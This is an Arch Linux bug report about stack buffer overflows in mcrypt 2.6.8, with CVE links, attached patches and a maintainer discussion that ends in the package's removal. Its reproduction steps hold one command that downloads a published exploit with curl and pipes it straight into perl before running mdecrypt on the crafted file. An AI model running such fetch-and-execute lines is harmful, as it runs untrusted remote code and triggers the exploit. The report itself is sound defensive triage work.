FS#32877 - [mcrypt] multiple security issues

Attached to Project: Arch Linux
Opened by Jens Adam (byte) - Tuesday, 27 November 2012, 09:30 GMT
Last edited by Jan de Groot (JGC) - Thursday, 04 July 2013, 11:12 GMT
Task Type Bug Report
Category Upstream Bugs
Status Closed
Assigned To Pierre Schmitz (Pierre)
Roman Kyrylych (Romashka)
Architecture All
Severity High
Priority Normal
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 0
Private No

Details

Description:
"mcrypt versions 2.6.8 and below suffer from a vulnerability that is caused due to a boundary error in the processing of an encrypted file, which can be exploited to cause a stack-based buffer overflow when a user opens a specially crafted .nc file. Successful exploitation could potentially allow execution of arbitrary code on the affected machine."
Source: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html
Links: http://security-tracker.debian.org/tracker/CVE-2012-4409

Steps to reproduce:
$ cd /tmp && curl -s http://dl.packetstormsecurity.net/1211-exploits/mcrypt-overflow.txt | perl && mdecrypt fake.nc

Our default build flags with stack protection will catch this, but a patch would be in order nonetheless.


Upon further investigation there are more issues:
http://security-tracker.debian.org/tracker/CVE-2012-4426 - already discussed and patched in the original thread starting at http://www.openwall.com/lists/oss-security/2012/09/06/1
http://security-tracker.debian.org/tracker/CVE-2012-4527 - another overflow regarding file names, source: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-4527

Patches and updated PKGBUILD attached.
   CVE-2012-4409.diff (0.5 KiB)
   CVE-2012-4426.diff (0.7 KiB)
   CVE-2012-4527.diff (3 KiB)
   PKGBUILD (0.9 KiB)
This task depends upon

Closed by  Jan de Groot (JGC)
Thursday, 04 July 2013, 11:12 GMT
Reason for closing:  Won't fix
Additional comments about closing:  mcrypt was removed from repository.
Comment by Jens Adam (byte) - Tuesday, 27 November 2012, 09:38 GMT
... and before the question comes up: Upstream is considered dead.
Comment by Daniel Micay (thestinger) - Thursday, 27 December 2012, 19:09 GMT
Perhaps this package should just be dropped then? There are lots of alternatives.
Comment by Adam Young (atyoung) - Thursday, 31 January 2013, 07:18 GMT
Better to move this over to the community if they have packages that require it, as it's orphaned so to speak.
Comment by Jens Adam (byte) - Thursday, 31 January 2013, 15:42 GMT
What's the problem here?
There has been no further development on the net on this issue afaik, all other distributions had already applied the patches before I posted this here, the issue is four months old, and above is a ready-to-go PKGBUILD.
I don't care at all about mcrypt, its usefulness or upstream maintenance, but as long as packages contain security problems, we patch them, minor/obscure or not.
So: patch it, or drop it.
Comment by Pierre Schmitz (Pierre) - Thursday, 31 January 2013, 19:33 GMT
I just removed the package from the repos as it is not needed by anything. It is still in svn though so it can easily be pushed back if needed.

Loading...